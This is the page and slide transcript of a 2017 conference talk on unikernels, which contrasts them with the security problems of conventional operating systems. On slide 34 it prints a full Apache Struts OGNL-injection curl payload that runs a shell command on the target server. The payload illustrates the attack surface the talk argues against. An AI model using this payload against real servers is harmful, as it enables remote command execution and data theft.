Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Climbing Out From the Digital Mud with Unikernels - HL2017

B3860e5f7d69df921650d2263ea047fd?s=47 Ian Eyberg
November 10, 2017

Climbing Out From the Digital Mud with Unikernels - HL2017

We've been accumulating digital mud for the past four decades with our software infrastructure. Unikernels offer a way forward to stop the security catastrophes and show the path forward.

B3860e5f7d69df921650d2263ea047fd?s=128

Ian Eyberg

November 10, 2017
Tweet

Transcript

  1. Climbing Out From the Digital Mud with Unikernels Ian Eyberg

  2. THE MONOLITHIC OPERATING SYSTEM

  3. DIGITAL MUD

  4. None
  5. A Decade Of Wasted Cores

  6. L I B X M L 2

  7. USB DRIVERS

  8. mongodb of devops

  9. HISTORY OF SOFTWARE DEVELOPMENT OVER 4 DECADES

  10. JANUARY 1ST 1970

  11. 1980

  12. 1990

  13. 2000

  14. 2010

  15. What Is An Operating System?

  16. What is an application? 7f 45 4c 46

  17. security

  18. pagerduty alert

  19. ulimits are off?? bash: fork: retry: Resource temporarily unavailable bash:

    fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable bash: fork: retry: Resource temporarily unavailable
  20. None
  21. sudo apt- get install emacs

  22. VICTORY

  23. 2 weeks later

  24. None
  25. SUDO OH- FUCKING-SHIT

  26. security pain

  27. 143M records of personal information stolen

  28. C I O , C I S O , C

    E O “ R E T I R E D ”
  29. None
  30. M U LT I P L E C O N

    G R E S S I O N A L H E A R I N G S
  31. I N S I D E R T R A

    D I N G I N V E S T I G AT I O N
  32. D O Z E N S O F C L

    A S S A C T I O N L AW S U I T S
  33. None
  34. curl i -s -k -x $’GET’ \ —H $'User-Agent: Mozilla/5.0'

    -H $'Content-Type: %{(#_=\'multipart/form- data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess? (#_memberAccess=#dm): ((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))). (#cmd=\'ls -lat /\'). (#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'w in\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'- c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)). (#p.redirectErrorStream(true)).(#process=#p.start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream( ))).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush())}' $’https://pure.ownage'
  35. None
  36. PA S S W O R D S ? S

    H E L L ? D B A C C E S S ?
  37. T H E F U T U R E I

    S U N I K E R N E L S
  38. None
  39. single process

  40. n o u s e r s

  41. NO SHELL

  42. None
  43. OIL PLATFORM WANTS TO SECURE CONTROL DATA

  44. BIO TECH FIRM WANTS CHEAP SECURE COMPUTE

  45. NOTABLE UNIKERNEL PROJECTS

  46. None
  47. https://github.com/Solo5/solo5 u n i c o r e

  48. TEXT 2.3MS BOOT TIME sysml.neclab.eu/projects/lightvm

  49. GO GET GITHUB.COM/DEFERPANIC/ VIRGO

  50. ▸ search for existing apps ▸ create a new app

    ▸ show running apps ▸ show installed apps ▸ run an app ▸ pull project D E M O T I M E
  51. GITHUB.COM/DEFERPANIC/VIRGO

  52. GITHUB.COM/DEFERPANIC/VIRGO

  53. GITHUB.COM/DEFERPANIC/VIRGO

  54. GITHUB.COM/DEFERPANIC/VIRGO

  55. GITHUB.COM/DEFERPANIC/VIRGO

  56. GITHUB.COM/DEFERPANIC/VIRGO

  57. GITHUB.COM/DEFERPANIC/VIRGO

  58. WHAT WILL YOU BUILD?